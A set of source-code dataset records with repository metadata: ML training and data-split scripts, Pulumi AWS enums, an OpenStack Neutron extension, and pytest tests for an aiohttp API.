input_tensors = [model.outputs, model.summ_op, model.sparsity]
result_val = sess.run(input_tensors, feed_dict)
# Check summary and print results
if (itr+1) % args.check_interval == 0:
writer['train'].add_summary(result[1], itr)
writer['val'].add_summary(result_val[1], itr)
pstr = '(train/val) los:{:.3f}/{:.3f} acc:{:.3f}/{:.3f} spa:{:.3f} lr:{:.7f}'.format(
result[0]['los'], result_val[0]['los'],
result[0]['acc'], result_val[0]['acc'],
result[2], result[0]['lr'],
)
print('itr{}: {} (t:{:.1f})'.format(itr+1, pstr, time.time() - t_start))
t_start = time.time()
# Save model
if best_val_loss > result_val[0]['los']:
print('save model, becase best_val_loss({:.3f}) > current_val_loss({:.3f})'.format(
best_val_loss, result_val[0]['los']
))
saver.save(sess, args.path_model + '/itr-' + str(itr))
best_val_loss = result_val[0]['los']
# # Save model
# if (itr+1) % args.save_interval == 0:
# saver.save(sess, args.path_model + '/itr-' + str(itr))
filtered:remove_function_no_docstring: 2,866 | filtered:remove_class_no_docstring: 0 | filtered:remove_delete_markers: 23
hexsha: 0e58e67d4649d5ef878008d9074dacf7645f53e2 | size: 4,768 | ext: py | lang: Python
repo_path: m1_resnet.py | repo_name: VinGPan/Kaggle-HumanProtein | repo_head_hexsha: 4d1abcc7f46774355644d30428ed6c73b28fd782 | repo_licenses: ["Apache-2.0"] (identical across the max_stars, max_issues, and max_forks column groups)
max_stars_count: null | max_issues_count: null | max_forks_count: null | all stars/issues/forks event datetimes: null
content:
from keras_retinanet.bin.train import train_main
from keras_retinanet import models
import glob
import numpy as np
from sklearn.metrics import f1_score
import os
if __name__ == '__main__':
os.chdir("../")
model_name = 'resnet101'
train_main(0, None, ["csv", "data/trn1.csv", "data/classes.csv",
"--val-annotations", "data/val1.csv"])
# model_name = 'resnet50'
# h5s = glob.glob("run1_resnet_50/*.h5")
# results = []
# best_f1 = 0
# for h5 in h5s:
# y_true, y_pred = train_main(1, h5, ["csv", "data/trn1.csv", "data/classes.csv",
# "--val-annotations", "data/val1.csv"])
# f1_max = 0
# th_max = 0
# pr_cnt_max = 0
# for th in np.linspace(0.0, 1.0, num=21):
# for pr_cnt in range(1, 7):
# y_pred_new = []
# for prd in y_pred:
# ref_p = prd[(np.argsort(prd))[-pr_cnt]]
# dec = (prd >= ref_p) & (prd >= th)
# y_pred_new.append(dec)
# f1_cur = f1_score(y_true, np.array(y_pred_new, dtype='int'), average='macro')
# if f1_cur >= f1_max:
# f1_max = f1_cur
# th_max = th
# pr_cnt_max = pr_cnt
# results.append((h5, th_max, pr_cnt_max, f1_max))
# print([h5, th_max, pr_cnt_max, f1_max])
# if f1_max >= best_f1:
# best_f1 = f1_max
# print("current best = ", best_f1)
#
# results = sorted(results, key=lambda x:x[-1], reverse=True)
# for r in results:
# print(r)
#[('snapshots\\resnet50_csv_44.h5', 0.05, 0.44536340852130324), ('snapshots\\resnet50_csv_48.h5', 0.05, 0.445054945054945), ('snapshots\\resnet50_csv_34.h5', 0.05, 0.437181855500821), ('snapshots\\resnet50_csv_49.h5', 0.0, 0.4327235488525811), ('snapshots\\resnet50_csv_45.h5', 0.05, 0.42369674185463657), ('snapshots\\resnet50_csv_28.h5', 0.0, 0.41797258297258294), ('snapshots\\resnet50_csv_22.h5', 0.1, 0.40782312925170067), ('snapshots\\resnet50_csv_30.h5', 0.05, 0.40745030745030747), ('snapshots\\resnet50_csv_50.h5', 0.1, 0.4013157894736842), ('snapshots\\resnet50_csv_37.h5', 0.0, 0.39436633627810097), ('snapshots\\resnet50_csv_47.h5', 0.0, 0.3908092403628118), ('snapshots\\resnet50_csv_41.h5', 0.2, 0.38839285714285715), ('snapshots\\resnet50_csv_35.h5', 0.15000000000000002, 0.38822228496141536), ('snapshots\\resnet50_csv_36.h5', 0.1, 0.38399981614267326), ('snapshots\\resnet50_csv_43.h5', 0.05, 0.3828025149453721), ('snapshots\\resnet50_csv_17.h5', 0.15000000000000002, 0.3746598639455782), ('snapshots\\resnet50_csv_21.h5', 0.05, 0.37316799237981496), ('snapshots\\resnet50_csv_29.h5', 0.0, 0.3672226582940869), ('snapshots\\resnet50_csv_32.h5', 0.1, 0.3669642857142857), ('snapshots\\resnet50_csv_39.h5', 0.05, 0.3659983291562239), ('snapshots\\resnet50_csv_33.h5', 0.05, 0.36450650157546705), ('snapshots\\resnet50_csv_46.h5', 0.1, 0.3637418137418137), ('snapshots\\resnet50_csv_42.h5', 0.0, 0.3635427827546054), ('snapshots\\resnet50_csv_25.h5', 0.05, 0.36262793405650545), ('snapshots\\resnet50_csv_11.h5', 0.05, 0.3579434337837699), ('snapshots\\resnet50_csv_27.h5', 0.05, 0.3495562586818953), ('snapshots\\resnet50_csv_40.h5', 0.0, 0.3492804814233386), ('snapshots\\resnet50_csv_31.h5', 0.05, 0.348015873015873), ('snapshots\\resnet50_csv_38.h5', 0.0, 0.3360606404724052), ('snapshots\\resnet50_csv_18.h5', 0.05, 0.3308032303830623), ('snapshots\\resnet50_csv_16.h5', 0.1, 0.32845804988662136), ('snapshots\\resnet50_csv_14.h5', 0.05, 0.32814818234986304), ('snapshots\\resnet50_csv_26.h5', 0.1, 0.3254329004329004), ('snapshots\\resnet50_csv_19.h5', 0.05, 0.3204281712685074), ('snapshots\\resnet50_csv_15.h5', 0.0, 0.3152310924369747), ('snapshots\\resnet50_csv_20.h5', 0.1, 0.29930213464696226), ('snapshots\\resnet50_csv_10.h5', 0.05, 0.2901406742663109), ('snapshots\\resnet50_csv_13.h5', 0.1, 0.27293083900226756), ('snapshots\\resnet50_csv_24.h5', 0.1, 0.2708245722531437), ('snapshots\\resnet50_csv_12.h5', 0.1, 0.2673262853528508), ('snapshots\\resnet50_csv_23.h5', 0.1, 0.2638221955448846), ('snapshots\\resnet50_csv_04.h5', 0.25, 0.24969474969474967), ('snapshots\\resnet50_csv_09.h5', 0.05, 0.24739891704177416), ('snapshots\\resnet50_csv_05.h5', 0.2, 0.24424342105263158), ('snapshots\\resnet50_csv_06.h5', 0.15000000000000002, 0.23761446886446885), ('snapshots\\resnet50_csv_07.h5', 0.15000000000000002, 0.233078231292517), ('snapshots\\resnet50_csv_03.h5', 0.15000000000000002, 0.21793958962895502), ('snapshots\\resnet50_csv_01.h5', 0.05, 0.19410188317751345), ('snapshots\\resnet50_csv_02.h5', 0.05, 0.19065212731754366), ('snapshots\\resnet50_csv_08.h5', 0.15000000000000002, 0.18758503401360543)]
avg_line_length: 103.652174 | max_line_length: 3,138 | alphanum_fraction: 0.676594
original_content:
from keras_retinanet.bin.train import train_main
from keras_retinanet import models
import glob
import numpy as np
from sklearn.metrics import f1_score
import os
if __name__ == '__main__':
os.chdir("../")
model_name = 'resnet101'
train_main(0, None, ["csv", "data/trn1.csv", "data/classes.csv",
"--val-annotations", "data/val1.csv"])
# model_name = 'resnet50'
# h5s = glob.glob("run1_resnet_50/*.h5")
# results = []
# best_f1 = 0
# for h5 in h5s:
# y_true, y_pred = train_main(1, h5, ["csv", "data/trn1.csv", "data/classes.csv",
# "--val-annotations", "data/val1.csv"])
# f1_max = 0
# th_max = 0
# pr_cnt_max = 0
# for th in np.linspace(0.0, 1.0, num=21):
# for pr_cnt in range(1, 7):
# y_pred_new = []
# for prd in y_pred:
# ref_p = prd[(np.argsort(prd))[-pr_cnt]]
# dec = (prd >= ref_p) & (prd >= th)
# y_pred_new.append(dec)
# f1_cur = f1_score(y_true, np.array(y_pred_new, dtype='int'), average='macro')
# if f1_cur >= f1_max:
# f1_max = f1_cur
# th_max = th
# pr_cnt_max = pr_cnt
# results.append((h5, th_max, pr_cnt_max, f1_max))
# print([h5, th_max, pr_cnt_max, f1_max])
# if f1_max >= best_f1:
# best_f1 = f1_max
# print("current best = ", best_f1)
#
# results = sorted(results, key=lambda x:x[-1], reverse=True)
# for r in results:
# print(r)
#[('snapshots\\resnet50_csv_44.h5', 0.05, 0.44536340852130324), ('snapshots\\resnet50_csv_48.h5', 0.05, 0.445054945054945), ('snapshots\\resnet50_csv_34.h5', 0.05, 0.437181855500821), ('snapshots\\resnet50_csv_49.h5', 0.0, 0.4327235488525811), ('snapshots\\resnet50_csv_45.h5', 0.05, 0.42369674185463657), ('snapshots\\resnet50_csv_28.h5', 0.0, 0.41797258297258294), ('snapshots\\resnet50_csv_22.h5', 0.1, 0.40782312925170067), ('snapshots\\resnet50_csv_30.h5', 0.05, 0.40745030745030747), ('snapshots\\resnet50_csv_50.h5', 0.1, 0.4013157894736842), ('snapshots\\resnet50_csv_37.h5', 0.0, 0.39436633627810097), ('snapshots\\resnet50_csv_47.h5', 0.0, 0.3908092403628118), ('snapshots\\resnet50_csv_41.h5', 0.2, 0.38839285714285715), ('snapshots\\resnet50_csv_35.h5', 0.15000000000000002, 0.38822228496141536), ('snapshots\\resnet50_csv_36.h5', 0.1, 0.38399981614267326), ('snapshots\\resnet50_csv_43.h5', 0.05, 0.3828025149453721), ('snapshots\\resnet50_csv_17.h5', 0.15000000000000002, 0.3746598639455782), ('snapshots\\resnet50_csv_21.h5', 0.05, 0.37316799237981496), ('snapshots\\resnet50_csv_29.h5', 0.0, 0.3672226582940869), ('snapshots\\resnet50_csv_32.h5', 0.1, 0.3669642857142857), ('snapshots\\resnet50_csv_39.h5', 0.05, 0.3659983291562239), ('snapshots\\resnet50_csv_33.h5', 0.05, 0.36450650157546705), ('snapshots\\resnet50_csv_46.h5', 0.1, 0.3637418137418137), ('snapshots\\resnet50_csv_42.h5', 0.0, 0.3635427827546054), ('snapshots\\resnet50_csv_25.h5', 0.05, 0.36262793405650545), ('snapshots\\resnet50_csv_11.h5', 0.05, 0.3579434337837699), ('snapshots\\resnet50_csv_27.h5', 0.05, 0.3495562586818953), ('snapshots\\resnet50_csv_40.h5', 0.0, 0.3492804814233386), ('snapshots\\resnet50_csv_31.h5', 0.05, 0.348015873015873), ('snapshots\\resnet50_csv_38.h5', 0.0, 0.3360606404724052), ('snapshots\\resnet50_csv_18.h5', 0.05, 0.3308032303830623), ('snapshots\\resnet50_csv_16.h5', 0.1, 0.32845804988662136), ('snapshots\\resnet50_csv_14.h5', 0.05, 0.32814818234986304), ('snapshots\\resnet50_csv_26.h5', 0.1, 0.3254329004329004), ('snapshots\\resnet50_csv_19.h5', 0.05, 0.3204281712685074), ('snapshots\\resnet50_csv_15.h5', 0.0, 0.3152310924369747), ('snapshots\\resnet50_csv_20.h5', 0.1, 0.29930213464696226), ('snapshots\\resnet50_csv_10.h5', 0.05, 0.2901406742663109), ('snapshots\\resnet50_csv_13.h5', 0.1, 0.27293083900226756), ('snapshots\\resnet50_csv_24.h5', 0.1, 0.2708245722531437), ('snapshots\\resnet50_csv_12.h5', 0.1, 0.2673262853528508), ('snapshots\\resnet50_csv_23.h5', 0.1, 0.2638221955448846), ('snapshots\\resnet50_csv_04.h5', 0.25, 0.24969474969474967), ('snapshots\\resnet50_csv_09.h5', 0.05, 0.24739891704177416), ('snapshots\\resnet50_csv_05.h5', 0.2, 0.24424342105263158), ('snapshots\\resnet50_csv_06.h5', 0.15000000000000002, 0.23761446886446885), ('snapshots\\resnet50_csv_07.h5', 0.15000000000000002, 0.233078231292517), ('snapshots\\resnet50_csv_03.h5', 0.15000000000000002, 0.21793958962895502), ('snapshots\\resnet50_csv_01.h5', 0.05, 0.19410188317751345), ('snapshots\\resnet50_csv_02.h5', 0.05, 0.19065212731754366), ('snapshots\\resnet50_csv_08.h5', 0.15000000000000002, 0.18758503401360543)]
filtered:remove_function_no_docstring: 0 | filtered:remove_class_no_docstring: 0 | filtered:remove_delete_markers: 0
hexsha: 27d6a355d2304d3fc689d470c15bce5dbf127caf | size: 5,795 | ext: py | lang: Python
repo_path: sdk/python/pulumi_aws_native/customerprofiles/_enums.py | repo_name: AaronFriel/pulumi-aws-native | repo_head_hexsha: 5621690373ac44accdbd20b11bae3be1baf022d1 | repo_licenses: ["Apache-2.0"] (identical across the max_stars, max_issues, and max_forks column groups)
max_stars_count: 29 | stars events: 2021-09-30T19:32:07.000Z to 2022-03-22T21:06:08.000Z
max_issues_count: 232 | issues events: 2021-09-30T19:26:26.000Z to 2022-03-31T23:22:06.000Z
max_forks_count: 4 | forks events: 2021-11-10T19:42:01.000Z to 2022-02-05T10:15:49.000Z
content:
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
from enum import Enum
__all__ = [
'IntegrationConnectorType',
'IntegrationMarketoConnectorOperator',
'IntegrationOperatorPropertiesKeys',
'IntegrationS3ConnectorOperator',
'IntegrationSalesforceConnectorOperator',
'IntegrationScheduledTriggerPropertiesDataPullMode',
'IntegrationServiceNowConnectorOperator',
'IntegrationTaskType',
'IntegrationTriggerType',
'IntegrationZendeskConnectorOperator',
'ObjectTypeFieldContentType',
'ObjectTypeKeyStandardIdentifiersItem',
]
class ObjectTypeFieldContentType(str, Enum):
"""
The content type of the field. Used for determining equality when searching.
"""
STRING = "STRING"
NUMBER = "NUMBER"
PHONE_NUMBER = "PHONE_NUMBER"
EMAIL_ADDRESS = "EMAIL_ADDRESS"
NAME = "NAME"
avg_line_length: 30.025907 | max_line_length: 80 | alphanum_fraction: 0.718033
original_content:
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
from enum import Enum
__all__ = [
'IntegrationConnectorType',
'IntegrationMarketoConnectorOperator',
'IntegrationOperatorPropertiesKeys',
'IntegrationS3ConnectorOperator',
'IntegrationSalesforceConnectorOperator',
'IntegrationScheduledTriggerPropertiesDataPullMode',
'IntegrationServiceNowConnectorOperator',
'IntegrationTaskType',
'IntegrationTriggerType',
'IntegrationZendeskConnectorOperator',
'ObjectTypeFieldContentType',
'ObjectTypeKeyStandardIdentifiersItem',
]
class IntegrationConnectorType(str, Enum):
SALESFORCE = "Salesforce"
MARKETO = "Marketo"
SERVICE_NOW = "ServiceNow"
ZENDESK = "Zendesk"
S3 = "S3"
class IntegrationMarketoConnectorOperator(str, Enum):
PROJECTION = "PROJECTION"
LESS_THAN = "LESS_THAN"
GREATER_THAN = "GREATER_THAN"
BETWEEN = "BETWEEN"
ADDITION = "ADDITION"
MULTIPLICATION = "MULTIPLICATION"
DIVISION = "DIVISION"
SUBTRACTION = "SUBTRACTION"
MASK_ALL = "MASK_ALL"
MASK_FIRST_N = "MASK_FIRST_N"
MASK_LAST_N = "MASK_LAST_N"
VALIDATE_NON_NULL = "VALIDATE_NON_NULL"
VALIDATE_NON_ZERO = "VALIDATE_NON_ZERO"
VALIDATE_NON_NEGATIVE = "VALIDATE_NON_NEGATIVE"
VALIDATE_NUMERIC = "VALIDATE_NUMERIC"
NO_OP = "NO_OP"
class IntegrationOperatorPropertiesKeys(str, Enum):
VALUE = "VALUE"
VALUES = "VALUES"
DATA_TYPE = "DATA_TYPE"
UPPER_BOUND = "UPPER_BOUND"
LOWER_BOUND = "LOWER_BOUND"
SOURCE_DATA_TYPE = "SOURCE_DATA_TYPE"
DESTINATION_DATA_TYPE = "DESTINATION_DATA_TYPE"
VALIDATION_ACTION = "VALIDATION_ACTION"
MASK_VALUE = "MASK_VALUE"
MASK_LENGTH = "MASK_LENGTH"
TRUNCATE_LENGTH = "TRUNCATE_LENGTH"
MATH_OPERATION_FIELDS_ORDER = "MATH_OPERATION_FIELDS_ORDER"
CONCAT_FORMAT = "CONCAT_FORMAT"
SUBFIELD_CATEGORY_MAP = "SUBFIELD_CATEGORY_MAP"
class IntegrationS3ConnectorOperator(str, Enum):
PROJECTION = "PROJECTION"
LESS_THAN = "LESS_THAN"
GREATER_THAN = "GREATER_THAN"
BETWEEN = "BETWEEN"
LESS_THAN_OR_EQUAL_TO = "LESS_THAN_OR_EQUAL_TO"
GREATER_THAN_OR_EQUAL_TO = "GREATER_THAN_OR_EQUAL_TO"
EQUAL_TO = "EQUAL_TO"
NOT_EQUAL_TO = "NOT_EQUAL_TO"
ADDITION = "ADDITION"
MULTIPLICATION = "MULTIPLICATION"
DIVISION = "DIVISION"
SUBTRACTION = "SUBTRACTION"
MASK_ALL = "MASK_ALL"
MASK_FIRST_N = "MASK_FIRST_N"
MASK_LAST_N = "MASK_LAST_N"
VALIDATE_NON_NULL = "VALIDATE_NON_NULL"
VALIDATE_NON_ZERO = "VALIDATE_NON_ZERO"
VALIDATE_NON_NEGATIVE = "VALIDATE_NON_NEGATIVE"
VALIDATE_NUMERIC = "VALIDATE_NUMERIC"
NO_OP = "NO_OP"
class IntegrationSalesforceConnectorOperator(str, Enum):
PROJECTION = "PROJECTION"
LESS_THAN = "LESS_THAN"
GREATER_THAN = "GREATER_THAN"
CONTAINS = "CONTAINS"
BETWEEN = "BETWEEN"
LESS_THAN_OR_EQUAL_TO = "LESS_THAN_OR_EQUAL_TO"
GREATER_THAN_OR_EQUAL_TO = "GREATER_THAN_OR_EQUAL_TO"
EQUAL_TO = "EQUAL_TO"
NOT_EQUAL_TO = "NOT_EQUAL_TO"
ADDITION = "ADDITION"
MULTIPLICATION = "MULTIPLICATION"
DIVISION = "DIVISION"
SUBTRACTION = "SUBTRACTION"
MASK_ALL = "MASK_ALL"
MASK_FIRST_N = "MASK_FIRST_N"
MASK_LAST_N = "MASK_LAST_N"
VALIDATE_NON_NULL = "VALIDATE_NON_NULL"
VALIDATE_NON_ZERO = "VALIDATE_NON_ZERO"
VALIDATE_NON_NEGATIVE = "VALIDATE_NON_NEGATIVE"
VALIDATE_NUMERIC = "VALIDATE_NUMERIC"
NO_OP = "NO_OP"
class IntegrationScheduledTriggerPropertiesDataPullMode(str, Enum):
INCREMENTAL = "Incremental"
COMPLETE = "Complete"
class IntegrationServiceNowConnectorOperator(str, Enum):
PROJECTION = "PROJECTION"
LESS_THAN = "LESS_THAN"
GREATER_THAN = "GREATER_THAN"
CONTAINS = "CONTAINS"
BETWEEN = "BETWEEN"
LESS_THAN_OR_EQUAL_TO = "LESS_THAN_OR_EQUAL_TO"
GREATER_THAN_OR_EQUAL_TO = "GREATER_THAN_OR_EQUAL_TO"
EQUAL_TO = "EQUAL_TO"
NOT_EQUAL_TO = "NOT_EQUAL_TO"
ADDITION = "ADDITION"
MULTIPLICATION = "MULTIPLICATION"
DIVISION = "DIVISION"
SUBTRACTION = "SUBTRACTION"
MASK_ALL = "MASK_ALL"
MASK_FIRST_N = "MASK_FIRST_N"
MASK_LAST_N = "MASK_LAST_N"
VALIDATE_NON_NULL = "VALIDATE_NON_NULL"
VALIDATE_NON_ZERO = "VALIDATE_NON_ZERO"
VALIDATE_NON_NEGATIVE = "VALIDATE_NON_NEGATIVE"
VALIDATE_NUMERIC = "VALIDATE_NUMERIC"
NO_OP = "NO_OP"
class IntegrationTaskType(str, Enum):
ARITHMETIC = "Arithmetic"
FILTER = "Filter"
MAP = "Map"
MASK = "Mask"
MERGE = "Merge"
TRUNCATE = "Truncate"
VALIDATE = "Validate"
class IntegrationTriggerType(str, Enum):
SCHEDULED = "Scheduled"
EVENT = "Event"
ON_DEMAND = "OnDemand"
class IntegrationZendeskConnectorOperator(str, Enum):
PROJECTION = "PROJECTION"
GREATER_THAN = "GREATER_THAN"
ADDITION = "ADDITION"
MULTIPLICATION = "MULTIPLICATION"
DIVISION = "DIVISION"
SUBTRACTION = "SUBTRACTION"
MASK_ALL = "MASK_ALL"
MASK_FIRST_N = "MASK_FIRST_N"
MASK_LAST_N = "MASK_LAST_N"
VALIDATE_NON_NULL = "VALIDATE_NON_NULL"
VALIDATE_NON_ZERO = "VALIDATE_NON_ZERO"
VALIDATE_NON_NEGATIVE = "VALIDATE_NON_NEGATIVE"
VALIDATE_NUMERIC = "VALIDATE_NUMERIC"
NO_OP = "NO_OP"
class ObjectTypeFieldContentType(str, Enum):
"""
The content type of the field. Used for determining equality when searching.
"""
STRING = "STRING"
NUMBER = "NUMBER"
PHONE_NUMBER = "PHONE_NUMBER"
EMAIL_ADDRESS = "EMAIL_ADDRESS"
NAME = "NAME"
class ObjectTypeKeyStandardIdentifiersItem(str, Enum):
PROFILE = "PROFILE"
UNIQUE = "UNIQUE"
SECONDARY = "SECONDARY"
LOOKUP_ONLY = "LOOKUP_ONLY"
NEW_ONLY = "NEW_ONLY"
filtered:remove_function_no_docstring: 0 | filtered:remove_class_no_docstring: 4,568 | filtered:remove_delete_markers: 253
hexsha: 2d12ec7f50c3d061e4b79a9ffffcc034bd787b1d | size: 2,104 | ext: py | lang: Python
repo_path: Dataset/split_data.py | repo_name: atmacvit/meronymnet | repo_head_hexsha: 47e1a7caadc0f770439bb26a93b885f790f62804 | repo_licenses: ["MIT"] (identical across the max_stars, max_issues, and max_forks column groups)
max_stars_count: 1 | stars events: 2021-11-02T05:13:12.000Z to 2021-11-02T05:13:12.000Z
max_issues_count: 1 | issues events: 2021-12-17T14:29:18.000Z to 2021-12-17T14:29:18.000Z
max_forks_count: null | forks event datetimes: null
content:
import numpy as np
import pickle
objects = ['cow', 'dog', 'person', 'horse', 'sheep', 'aeroplane', 'bird', 'bicycle', 'cat', 'motorbike', 'car']
for object_name in objects:
with open(object_name + '_part_separated_labels', 'rb') as f:
label = pickle.load(f)
with open(object_name + '_part_separated_bbx', 'rb') as f:
box = pickle.load(f)
with open(object_name + '_part_separated_masks', 'rb') as f:
mask = pickle.load(f)
with open(object_name + '_images', 'rb') as f:
o_images = pickle.load(f)
size = len(label)
train_split = int((75/100)*size)
validation_split = int((10/100)*size)
test_split = int((15/100)*size)
#train
with open(object_name+'_train_label', 'wb') as f:
pickle.dump(label[0:train_split], f)
with open(object_name+'_train_bbx', 'wb') as f:
pickle.dump(box[0:train_split], f)
with open(object_name+'_train_masks', 'wb') as f:
pickle.dump(mask[0:train_split], f)
with open(object_name+'_train_images', 'wb') as f:
pickle.dump(o_images[0:train_split], f)
#vaidation
with open(object_name+'_validation_label', 'wb') as f:
pickle.dump(label[train_split:train_split+validation_split], f)
with open(object_name+'_validation_bbx', 'wb') as f:
pickle.dump(box[train_split:train_split+validation_split], f)
with open(object_name+'_validation_masks', 'wb') as f:
pickle.dump(mask[train_split:train_split+validation_split], f)
with open(object_name+'_validation_images', 'wb') as f:
pickle.dump(o_images[train_split:train_split+validation_split], f)
#test
with open(object_name+'_test_label', 'wb') as f:
pickle.dump(label[train_split+validation_split::], f)
with open(object_name+'_test_bbx', 'wb') as f:
pickle.dump(box[train_split+validation_split::], f)
with open(object_name+'_test_masks', 'wb') as f:
pickle.dump(mask[train_split+validation_split::], f)
with open(object_name+'_test_images', 'wb') as f:
pickle.dump(o_images[train_split+validation_split::], f)
avg_line_length: 41.254902 | max_line_length: 112 | alphanum_fraction: 0.661122
original_content:
import numpy as np
import pickle
objects = ['cow', 'dog', 'person', 'horse', 'sheep', 'aeroplane', 'bird', 'bicycle', 'cat', 'motorbike', 'car']
for object_name in objects:
with open(object_name + '_part_separated_labels', 'rb') as f:
label = pickle.load(f)
with open(object_name + '_part_separated_bbx', 'rb') as f:
box = pickle.load(f)
with open(object_name + '_part_separated_masks', 'rb') as f:
mask = pickle.load(f)
with open(object_name + '_images', 'rb') as f:
o_images = pickle.load(f)
size = len(label)
train_split = int((75/100)*size)
validation_split = int((10/100)*size)
test_split = int((15/100)*size)
#train
with open(object_name+'_train_label', 'wb') as f:
pickle.dump(label[0:train_split], f)
with open(object_name+'_train_bbx', 'wb') as f:
pickle.dump(box[0:train_split], f)
with open(object_name+'_train_masks', 'wb') as f:
pickle.dump(mask[0:train_split], f)
with open(object_name+'_train_images', 'wb') as f:
pickle.dump(o_images[0:train_split], f)
#vaidation
with open(object_name+'_validation_label', 'wb') as f:
pickle.dump(label[train_split:train_split+validation_split], f)
with open(object_name+'_validation_bbx', 'wb') as f:
pickle.dump(box[train_split:train_split+validation_split], f)
with open(object_name+'_validation_masks', 'wb') as f:
pickle.dump(mask[train_split:train_split+validation_split], f)
with open(object_name+'_validation_images', 'wb') as f:
pickle.dump(o_images[train_split:train_split+validation_split], f)
#test
with open(object_name+'_test_label', 'wb') as f:
pickle.dump(label[train_split+validation_split::], f)
with open(object_name+'_test_bbx', 'wb') as f:
pickle.dump(box[train_split+validation_split::], f)
with open(object_name+'_test_masks', 'wb') as f:
pickle.dump(mask[train_split+validation_split::], f)
with open(object_name+'_test_images', 'wb') as f:
pickle.dump(o_images[train_split+validation_split::], f)
filtered:remove_function_no_docstring: 0 | filtered:remove_class_no_docstring: 0 | filtered:remove_delete_markers: 0
hexsha: ae765890a283e1cafc55cfc222fa3eddff1f2a46 | size: 2,302 | ext: py | lang: Python
repo_path: neutron/extensions/providernet.py | repo_name: MultipleCrashes/neutron | repo_head_hexsha: fb268d7e91b22192a6e42f78b0057b4ebd3033ef | repo_licenses: ["Apache-2.0"] (identical across the max_stars, max_issues, and max_forks column groups)
max_stars_count: 1 | stars events: 2019-06-02T06:15:39.000Z to 2019-06-02T06:15:39.000Z
max_issues_count: null | issues event datetimes: null
max_forks_count: null | forks event datetimes: null
content:
# Copyright (c) 2012 OpenStack Foundation.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron_lib.api.definitions import provider_net
from neutron_lib.api import extensions
from neutron_lib.api import validators
from neutron_lib import exceptions as n_exc
from neutron._i18n import _
def _raise_if_updates_provider_attributes(attrs):
"""Raise exception if provider attributes are present.
This method is used for plugins that do not support
updating provider networks.
"""
if any(validators.is_attr_set(attrs.get(a))
for a in provider_net.ATTRIBUTES):
msg = _("Plugin does not support updating provider attributes")
raise n_exc.InvalidInput(error_message=msg)
class Providernet(extensions.ExtensionDescriptor):
"""Extension class supporting provider networks.
This class is used by neutron's extension framework to make
metadata about the provider network extension available to
clients. No new resources are defined by this extension. Instead,
the existing network resource's request and response messages are
extended with attributes in the provider namespace.
With admin rights, network dictionaries returned will also include
provider attributes.
"""
@classmethod
@classmethod
@classmethod
@classmethod
avg_line_length: 32.885714 | max_line_length: 78 | alphanum_fraction: 0.728931
original_content:
# Copyright (c) 2012 OpenStack Foundation.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron_lib.api.definitions import provider_net
from neutron_lib.api import extensions
from neutron_lib.api import validators
from neutron_lib import exceptions as n_exc
from neutron._i18n import _
def _raise_if_updates_provider_attributes(attrs):
"""Raise exception if provider attributes are present.
This method is used for plugins that do not support
updating provider networks.
"""
if any(validators.is_attr_set(attrs.get(a))
for a in provider_net.ATTRIBUTES):
msg = _("Plugin does not support updating provider attributes")
raise n_exc.InvalidInput(error_message=msg)
class Providernet(extensions.ExtensionDescriptor):
"""Extension class supporting provider networks.
This class is used by neutron's extension framework to make
metadata about the provider network extension available to
clients. No new resources are defined by this extension. Instead,
the existing network resource's request and response messages are
extended with attributes in the provider namespace.
With admin rights, network dictionaries returned will also include
provider attributes.
"""
@classmethod
def get_name(cls):
return provider_net.NAME
@classmethod
def get_alias(cls):
return provider_net.ALIAS
@classmethod
def get_description(cls):
return provider_net.DESCRIPTION
@classmethod
def get_updated(cls):
return provider_net.UPDATED_TIMESTAMP
def get_extended_resources(self, version):
if version == "2.0":
return provider_net.RESOURCE_ATTRIBUTE_MAP
else:
return {}
filtered:remove_function_no_docstring: 293 | filtered:remove_class_no_docstring: 0 | filtered:remove_delete_markers: 131
hexsha: 8d7f3685a45adea2ebce073ffebe24607e61fa6d | size: 3,181 | ext: py | lang: Python
repo_path: tests/test_consumer_api.py | repo_name: tysongg/essential-cosmic | repo_head_hexsha: 1bd21b4ed246dfda983c6e49b0967a4a1a289d63 | repo_licenses: ["MIT"] (identical across the max_stars, max_issues, and max_forks column groups)
max_stars_count: null | stars event datetimes: null
max_issues_count: 9 | issues events: 2020-01-27T02:08:04.000Z to 2020-01-27T02:46:53.000Z
max_forks_count: null | forks event datetimes: null
content:
import pytest
import asyncio
import os
import sys
# Workaround so we don't have to create a setup.py file for the project and
# install an editable version
sys.path.append(os.path.join(os.path.dirname(__file__), os.pardir))
from essential_cosmic.app import make_app
avg_line_length: 31.186275 | max_line_length: 85 | alphanum_fraction: 0.607042
original_content:
import pytest
import asyncio
import os
import sys
# Workaround so we don't have to create a setup.py file for the project and
# install an editable version
sys.path.append(os.path.join(os.path.dirname(__file__), os.pardir))
from essential_cosmic.app import make_app
class TestConsumer:
@pytest.fixture(scope="function")
async def cli(self, aiohttp_client):
client = await aiohttp_client(make_app())
return client
@pytest.fixture(scope="function")
async def topic(self, cli):
resp = await cli.post("/topic", json={"title": "Test Topic"})
topic = await resp.json()
return topic
@pytest.fixture(scope="function")
async def messages(self, cli, topic):
resps = await asyncio.gather(
*[
cli.post(
"/topic/%s/message" % topic["id"], json={"value": "Test Message"}
)
for _ in range(3)
]
)
messages = await asyncio.gather(*[resp.json() for resp in resps])
return messages
async def test_topic_list(self, cli, topic):
resp = await cli.get("/topic")
assert resp.status == 200
body_json = await resp.json()
assert type(body_json) == list
assert len(body_json) == 1
async def test_topic_detail(self, cli, topic):
resp = await cli.get("/topic/%s" % topic["id"])
assert resp.status == 200
resp_json = await resp.json()
assert resp_json == topic
async def test_topic_detail_missing(self, cli):
resp = await cli.get("/topic/missing")
assert resp.status == 404
